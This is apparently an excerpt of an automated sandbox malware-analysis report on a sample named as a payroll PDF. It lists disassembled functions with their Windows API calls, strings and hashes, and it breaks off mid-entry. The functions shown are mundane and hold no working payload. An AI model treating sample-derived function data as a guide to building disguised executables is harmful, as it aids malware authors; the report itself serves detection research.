Instruction Fuzzy Hash: 32412475634206EBDB24EF38D942E7A73E8EF05300F20446EE949C7281EA71A865CB12

Function 002D73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002D73D9
CreateMenu.USER32 ref: 002D73F4
SetMenu.USER32(?,00000000), ref: 002D7403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D7490
IsMenu.USER32(?), ref: 002D74A6
CreatePopupMenu.USER32 ref: 002D74B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D74DD
DrawMenuBar.USER32 ref: 002D74E5

Strings

F, xrefs: 002D74D1
0, xrefs: 002D73CF

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 6a36d6bf955e700c037e56f6061558d6c363d0694da9f3124abfb27e45f62ebe
Instruction ID: 950cda9c4f64cfc763c6e69996bffc5da26ec83473a7d735ae2e0861663d1f74
Opcode Fuzzy Hash: 6a36d6bf955e700c037e56f6061558d6c363d0694da9f3124abfb27e45f62ebe
Instruction Fuzzy Hash: FA416A74A15205EFDB21DF64E949A9ABBB9FF09300F14402AED0697390E734AD20CF50

Function 002D772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002D77CD
CreateCompatibleDC.GDI32(00000000), ref: 002D77D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002D77E7
SelectObject.GDI32(00000000,00000000), ref: 002D77EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 002D77FA
DeleteDC.GDI32(00000000), ref: 002D7803
GetWindowLongW.USER32(?,000000EC), ref: 002D780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002D7821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002D782D

Strings

static, xrefs: 002D7765

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 8cde95abfbb96444fb61f6c66f661e82aaaa64c325a32b65af1a87318f6b0ec0
Instruction ID: 40ef01fde25285bac413508daac4f735368dc384fe11096970f58b772dd64e93
Opcode Fuzzy Hash: 8cde95abfbb96444fb61f6c66f661e82aaaa64c325a32b65af1a87318f6b0ec0
Instruction Fuzzy Hash: B931AF31515115ABDF125F64EC09FDA3B69FF09321F114226FA16E21A0D735DC21DBA8

Function 00277040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0027707B

Part of subcall function 00278D68: __getptd_noexit.LIBCMT ref: 00278D68

__gmtime64_s.LIBCMT ref: 00277114
__gmtime64_s.LIBCMT ref: 0027714A
__gmtime64_s.LIBCMT ref: 00277167
__allrem.LIBCMT ref: 002771BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002771D9
__allrem.LIBCMT ref: 002771F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0027720E
__allrem.LIBCMT ref: 00277225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00277243
__invoke_watson.LIBCMT ref: 002772B4

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 5c15b071a04684982c83ac902be43b2eb27d6e5eef7a3afa60eb4a519ac108af
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: E971C875A25717ABE714EE79CC41B5AB3A8AF10720F14823AF918D76C1E770DD608BD0

Function 002B2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B2A31
GetMenuItemInfoW.USER32(00316890,000000FF,00000000,00000030), ref: 002B2A92
SetMenuItemInfoW.USER32(00316890,00000004,00000000,00000030), ref: 002B2AC8
Sleep.KERNEL32(000001F4), ref: 002B2ADA
GetMenuItemCount.USER32(?), ref: 002B2B1E
GetMenuItemID.USER32(?,00000000), ref: 002B2B3A
GetMenuItemID.USER32(?,-00000001), ref: 002B2B64
GetMenuItemID.USER32(?,?), ref: 002B2BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002B2BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2C24

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 6a9f3b26cfeeb3316b842bc224c29a237c55d382806275137210fdceb473a8c7
Instruction ID: 13cda8f8e52ab77195554a9aa2eb16e8ba3dc613ed41bd4007a8f7a10e35bc12
Opcode Fuzzy Hash: 6a9f3b26cfeeb3316b842bc224c29a237c55d382806275137210fdceb473a8c7
Instruction Fuzzy Hash: AA61C27092034AEFDB11CF54DD88EFE7BB8EB05388F14455AE84293251DB31AD69DB21

Function 002D7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002D7214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002D7217
GetWindowLongW.USER32(?,000000F0), ref: 002D723B
_memset.LIBCMT ref: 002D724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002D725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002D72D6

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 7f12104b5585226432d53ce8d975d596271147e5e37c3891dc654cae73743564
Instruction ID: b75e63a3f53fbf0f60c0326cc7abe24390674a22482452f3a8fccb607c22e97b
Opcode Fuzzy Hash: 7f12104b5585226432d53ce8d975d596271147e5e37c3891dc654cae73743564
Instruction Fuzzy Hash: 25619970A00208AFDB11DFA8CC81EEE77F8EB09300F10419AFA15A73A1D774AD51DBA0

Function 002A710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002A7135
SafeArrayAllocData.OLEAUT32(?), ref: 002A718E
VariantInit.OLEAUT32(?), ref: 002A71A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 002A71C0
VariantCopy.OLEAUT32(?,?), ref: 002A7213
SafeArrayUnaccessData.OLEAUT32(?), ref: 002A7227
VariantClear.OLEAUT32(?), ref: 002A723C
SafeArrayDestroyData.OLEAUT32(?), ref: 002A7249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A7252
VariantClear.OLEAUT32(?), ref: 002A7264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A726F

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 30b932c1c760012d5dcafa9004e33a7c350b2538539eaa4c47ad91c4374493a3
Instruction ID: e6310b87c11a06a6e2ec9a2c193ac74318e3ab45f8fe2cb26b832a9283339f11
Opcode Fuzzy Hash: 30b932c1c760012d5dcafa9004e33a7c350b2538539eaa4c47ad91c4374493a3
Instruction Fuzzy Hash: A7413D35D10219EFCB00DF64DD48AAEBBB8EF49354F00806AFA56A7261CB30AD55CF94

Function 002C86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00259997: __itow.LIBCMT ref: 002599C2
Part of subcall function 00259997: __swprintf.LIBCMT ref: 00259A0C

CoInitialize.OLE32 ref: 002C8718
CoUninitialize.OLE32 ref: 002C8723
CoCreateInstance.OLE32(?,00000000,00000017,002E2BEC,?), ref: 002C8783
IIDFromString.OLE32(?,?), ref: 002C87F6
VariantInit.OLEAUT32(?), ref: 002C8890
VariantClear.OLEAUT32(?), ref: 002C88F1

Strings

NULL Pointer assignment, xrefs: 002C87C8
Failed to create object, xrefs: 002C878E, 002C8844
Invalid parameter, xrefs: 002C880F

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 1e36a57485d42925bb9ef4b8c62a758323b852bf42a935e4ad2b820bc5acab52
Instruction ID: f56ca9f7e19e9415d10baff660a279c67c7366652203e4a544e2f543811fc664
Opcode Fuzzy Hash: 1e36a57485d42925bb9ef4b8c62a758323b852bf42a935e4ad2b820bc5acab52
Instruction Fuzzy Hash: 5C61D134628302DFD710DF24C948F6AB7E8AF49714F108A1DF9859B291DB70ED58CB96

Function 002C5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002C5AA6
inet_addr.WSOCK32(?,?,?), ref: 002C5AEB
gethostbyname.WSOCK32(?), ref: 002C5AF7
IcmpCreateFile.IPHLPAPI ref: 002C5B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002C5B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002C5B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 002C5C00
WSACleanup.WSOCK32 ref: 002C5C06

Strings

Ping, xrefs: 002C5B29

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 47ce6ada1ba69ce43b5b6d0643e6ccf0f3e3b5b891a4e609cb4dda3289ff444d
Instruction ID: 0017759146c7fc21a3593fe03f97e0181170007e8a20697728cf0f8c6171f1d0
Opcode Fuzzy Hash: 47ce6ada1ba69ce43b5b6d0643e6ccf0f3e3b5b891a4e609cb4dda3289ff444d
Instruction Fuzzy Hash: 2B519D31624B119FD7109F24DC49F2ABBE0EB48314F148A2AF95ADB2A1DB70FC948B05

Function 002BB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002BB73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002BB7B1
GetLastError.KERNEL32 ref: 002BB7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 002BB828

Strings

NOTREADY, xrefs: 002BB7E7
INVALID, xrefs: 002BB7FA
READY, xrefs: 002BB801
UNKNOWN, xrefs: 002BB7E0
READONLY, xrefs: 002BB7F3

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 60c2e60e19953c94827d57a20d354071cdbfc767728d06e3d0ae0f81e5e0abe1
Instruction ID: b960cfdc2944cc32a5d52ba07582477b648daff59e979afd1f44ed6a17d2f135
Opcode Fuzzy Hash: 60c2e60e19953c94827d57a20d354071cdbfc767728d06e3d0ae0f81e5e0abe1
Instruction Fuzzy Hash: 3F31E635A102059FDB02EF64D889EFEBBB8EF44341F14802AE806D7291DBB19D56DB51

Function 002A9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

Part of subcall function 002AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 002AB0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002A94F6
GetDlgCtrlID.USER32 ref: 002A9501
GetParent.USER32 ref: 002A951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 002A9520
GetDlgCtrlID.USER32(?), ref: 002A9529
GetParent.USER32(?), ref: 002A9545
SendMessageW.USER32(00000000,?,?,00000111), ref: 002A9548

Strings

ListBox, xrefs: 002A94B3
ComboBox, xrefs: 002A947E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: aa57230c6610ba6af5f4d4505a898260a66a41279d4217ffdc0e8d9be379b557
Instruction ID: 72486bf8d6e237addb273b65c1e46a530d46342d544d9a5dcfcefded8a0bc381
Opcode Fuzzy Hash: aa57230c6610ba6af5f4d4505a898260a66a41279d4217ffdc0e8d9be379b557
Instruction Fuzzy Hash: 2021E270D10104ABCF01AF65DC89EFEBB68EF4A300F104126B922972E2DF759929DE60

Function 002A955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

Part of subcall function 002AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 002AB0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002A95DF
GetDlgCtrlID.USER32 ref: 002A95EA
GetParent.USER32 ref: 002A9606
SendMessageW.USER32(00000000,?,00000111,?), ref: 002A9609
GetDlgCtrlID.USER32(?), ref: 002A9612
GetParent.USER32(?), ref: 002A962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 002A9631

Strings

ListBox, xrefs: 002A959E
ComboBox, xrefs: 002A9569

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: acd2924a89c6808c5c1a99cfe85a3735ae575ce483df3bf7ed0368003d82e88f
Instruction ID: 38a358b22a9724a62f58f542cb013c33debe403d36f7c0492850441c2a17ed17
Opcode Fuzzy Hash: acd2924a89c6808c5c1a99cfe85a3735ae575ce483df3bf7ed0368003d82e88f
Instruction Fuzzy Hash: E621D670D11204BBDF01AB61DC95EFEBBB8EF49300F104056F922972E2DB759969DE24

Function 002A9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 002A9651
GetClassNameW.USER32(00000000,?,00000100), ref: 002A9666
_wcscmp.LIBCMT ref: 002A9678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002A96F3

Strings

SHELLDLL_DefView, xrefs: 002A9672
largeicons, xrefs: 002A9687
details, xrefs: 002A96A1
smallicons, xrefs: 002A96BB
list, xrefs: 002A96D5

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: f08c1b75ce1c0912194016ec80047ea68431ba1fdf9bc2006061568af938cff8
Instruction ID: 5dc6f78c39442675c69705221ead86dcfad2a7b0a831262d469f1a1fce921852
Opcode Fuzzy Hash: f08c1b75ce1c0912194016ec80047ea68431ba1fdf9bc2006061568af938cff8
Instruction Fuzzy Hash: 521120775653077BFA012622DC1BEE6779C8F07B60F204017F905A50D2FEA199B05D58

Function 002B4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 002B419D
__swprintf.LIBCMT ref: 002B41AA

Part of subcall function 002738D8: __woutput_l.LIBCMT ref: 00273931

FindResourceW.KERNEL32(?,?,0000000E), ref: 002B41D4
LoadResource.KERNEL32(?,00000000), ref: 002B41E0
LockResource.KERNEL32(00000000), ref: 002B41ED
FindResourceW.KERNEL32(?,?,00000003), ref: 002B420D
LoadResource.KERNEL32(?,00000000), ref: 002B421F
SizeofResource.KERNEL32(?,00000000), ref: 002B422E
LockResource.KERNEL32(?), ref: 002B423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002B429B

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 3dc4746c51aefbd54d5fadc730bb87e7ae9ec286cc90897d74cfed21acdef9dd
Instruction ID: 8d7211d8d048629662fea1b3d44ac535171cb1869fcfed01285abb396549d042
Opcode Fuzzy Hash: 3dc4746c51aefbd54d5fadc730bb87e7ae9ec286cc90897d74cfed21acdef9dd
Instruction Fuzzy Hash: C631B271A1520AABDB01AF60ED88EFF7BADEF08341F048526FC06D6151D770DE619BA4

Function 0025FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0025FC06
OleUninitialize.OLE32(?,00000000), ref: 0025FCA5
UnregisterHotKey.USER32(?), ref: 0025FDFC
DestroyWindow.USER32(?), ref: 00294A00
FreeLibrary.KERNEL32(?), ref: 00294A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00294A92

Strings

close all, xrefs: 0025FC01

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: ed3b1fbe6c7e4db157f8b994d9c32f0050159e06e0d95ca19d414de938174ca3
Instruction ID: bf0f8ebb6a964dd5af7dcf79153a4aafa092ddb2e2203a0f89a5b91bd6a85c6f
Opcode Fuzzy Hash: ed3b1fbe6c7e4db157f8b994d9c32f0050159e06e0d95ca19d414de938174ca3
Instruction Fuzzy Hash: 91A17D30722212CFCB69EF14C5A5E69F364AF04741F1442ADE90AAB251DB30ED3ACF58

Function 002C9428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002C947C
VariantInit.OLEAUT32(?), ref: 002C954D
VariantInit.OLEAUT32(?), ref: 002C964E
VariantClear.OLEAUT32(?), ref: 002C9658
VariantClear.OLEAUT32(?), ref: 002C96B5

Strings

Null Object assignment in FOR..IN loop, xrefs: 002C94DD, 002C960B, 002C96C3
,,., xrefs: 002C94FA
Incorrect Object type in FOR..IN loop, xrefs: 002C9631

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,.$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-1389923024
